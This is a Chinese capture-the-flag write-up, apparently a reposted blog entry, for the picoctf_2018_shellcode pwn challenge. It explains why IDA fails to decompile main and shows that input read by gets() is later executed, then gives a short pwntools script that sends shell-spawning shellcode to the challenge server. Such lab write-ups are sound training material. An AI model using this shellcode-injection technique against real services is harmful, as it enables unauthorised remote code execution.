[BUUCTF-pwn]——picoctf_2018_shellcode
生活随笔
收集整理的這篇文章主要介紹了
[BUUCTF-pwn]——picoctf_2018_shellcode
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
[BUUCTF-pwn]——picoctf_2018_shellcode
- 題目地址:https://buuoj.cn/challenges#picoctf_2018_shellcode
論學好匯編的重要性。在這道題得到了體現。
第一次面向匯編, 說實話看的挺慢的。
話不多說
直接上
checksec看下
IDA中沒法發反匯編,只能面向匯編編程。無法反匯編是call eax的問題,但是這個指令應該沒有錯,只能說這個時間eax存儲著一個函數地址。也就是[ebp+var_A0]偏移處的函數。
我們可以發現這個偏移也是vuln函數的參數。在vuln函數內,我們發現gets函數寫入的位置也是這里(ebp+8,32位就是參數的位置)。
所以也就是我們直接寫入shellcode,當執行call eax時就會自動執行。
當然這個只有main函數不可以反匯編其他還是可以的,你們也可以結合參考一下
exploit
from pwn import * p = remote("node3.buuoj.cn",27027) shellcode = asm(shellcraft.sh()) p.sendlineafter('Enter a string!\n',shellcode) p.interactive()總結
以上是生活随笔為你收集整理的[BUUCTF-pwn]——picoctf_2018_shellcode的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [BUUCTF-pwn]——picoct
- 下一篇: CTFshow——Pwn(1)